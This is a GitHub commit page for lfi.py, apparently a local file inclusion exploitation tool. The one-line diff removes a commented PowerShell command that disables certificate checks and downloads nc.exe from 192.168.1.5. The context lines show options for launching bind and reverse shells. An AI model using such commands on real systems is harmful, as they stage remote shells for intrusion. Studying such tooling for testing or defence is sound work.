Skip to content

Commit

Permalink
Update lfi.py
Browse files Browse the repository at this point in the history
  • Loading branch information
OsandaMalith committed Mar 29, 2015
1 parent e7ad13d commit 80e5d7e
Showing 1 changed file with 0 additions and 1 deletion.
1 change: 0 additions & 1 deletion lfi.py
Original file line number Diff line number Diff line change
Expand Up @@ -318,7 +318,6 @@ def com(method):
elif choice == 2 and method == 'phpInput': shells(method, 'bind')
elif choice == 3 and method == 'phpInput': shells(method, 'reverse')

#powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback= {$true}; $source="""http://192.168.1.5/nc.exe """; $destination= """C:\\nc.exe"""; $http = new-object System.Net.WebClient; $response= $http.DownloadFile($source, $destination);"
try: input = raw_input
except: pass

Expand Down

0 comments on commit 80e5d7e

Please sign in to comment.